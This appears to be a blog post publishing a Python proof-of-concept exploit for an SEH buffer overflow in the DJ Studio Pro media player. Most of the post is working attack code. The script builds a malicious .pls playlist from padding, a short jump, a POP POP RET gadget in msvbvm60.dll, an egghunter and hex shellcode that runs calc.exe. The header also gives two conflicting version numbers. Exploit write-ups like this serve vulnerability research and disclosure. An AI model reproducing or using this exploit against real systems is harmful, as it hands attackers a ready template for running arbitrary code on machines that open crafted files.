Info :
DJ Studio Pro Version 7.1.6.8.7 SEH 0 day .ASH_Q
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com |
#Web - http://www.aslitsecurity.com/ |
#Blog - http://www.aslitsecurity.blogspot.com/ |
#Download Vulnerable application from http://www.e-soft.co.uk/DJSP.htm |
#Vulnerable version DJ Studio Pro Version 8.1.3.2.1 |
#Tested on XP SP2 |
#Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM |
#!/usr/bin/python |
filename = "ASL.pls" |
#windows/exec - CMD=calc.exe |
shellcode = ( |
"\x41\x42\x48\x49\x41\x42\x48\x49" #Egg Hunted |
"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA" |
"\x4C\xA8\x75\x76\x83\xC0\x04\x31\x50\x13\x03\x1C\xBB\x97\x83\x60" |
"\x53\xDE\x6C\x98\xA4\x81\xE5\x7D\x95\x93\x92\xF6\x84\x23\xD0\x5A" |
"\x25\xCF\xB4\x4E\xBE\xBD\x10\x61\x77\x0B\x47\x4C\x88\xBD\x47\x02" |
"\x4A\xDF\x3B\x58\x9F\x3F\x05\x93\xD2\x3E\x42\xC9\x1D\x12\x1B\x86" |
"\x8C\x83\x28\xDA\x0C\xA5\xFE\x51\x2C\xDD\x7B\xA5\xD9\x57\x85\xF5" |
"\x72\xE3\xCD\xED\xF9\xAB\xED\x0C\x2D\xA8\xD2\x47\x5A\x1B\xA0\x56" |
"\x8A\x55\x49\x69\xF2\x3A\x74\x46\xFF\x43\xB0\x60\xE0\x31\xCA\x93" |
"\x9D\x41\x09\xEE\x79\xC7\x8C\x48\x09\x7F\x75\x69\xDE\xE6\xFE\x65" |
"\xAB\x6D\x58\x69\x2A\xA1\xD2\x95\xA7\x44\x35\x1C\xF3\x62\x91\x45" |
"\xA7\x0B\x80\x23\x06\x33\xD2\x8B\xF7\x91\x98\x39\xE3\xA0\xC2\x57" |
"\xF2\x21\x79\x1E\xF4\x39\x82\x30\x9D\x08\x09\xDF\xDA\x94\xD8\xA4" |
"\x05\x77\xC9\xD0\xAD\x2E\x98\x59\xB0\xD0\x76\x9D\xCD\x52\x73\x5D" |
"\x2A\x4A\xF6\x58\x76\xCC\xEA\x10\xE7\xB9\x0C\x87\x08\xE8\x6E\x46" |
"\x9B\x70\x5F\xED\x1B\x12\x9F" |
) |
egghunter = ( |
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" |
"\x41\x42\x48\x49" # Egghunter tag "ABHIABHI" Greets http://www.corelan.be:8800 |
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7" |
) |
head = "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D\x0D\x0A\x46\x69\x6C\x65\x31\x3D" |
junk = "\x41" * 1940 |
nseh = "\xeb\x06\x90\x90" # Short Jump |
seh = "\xcb\x75\x52\x73" # POP POP RET 0x735275CB msvbvm60.dll |
nop = "\x90" * 12 # NOP Sled |
padd = "\x90" * ( 5000 - len (junk + nseh + seh + nop + shellcode)) |
textfile = open (filename , 'w' ) |
textfile.write(head + junk + nseh + seh + nop + egghunter + padd + shellcode) |
textfile.close() |
No response to “DJ_Studio_Pro_7.1.6.8.7”
Leave a reply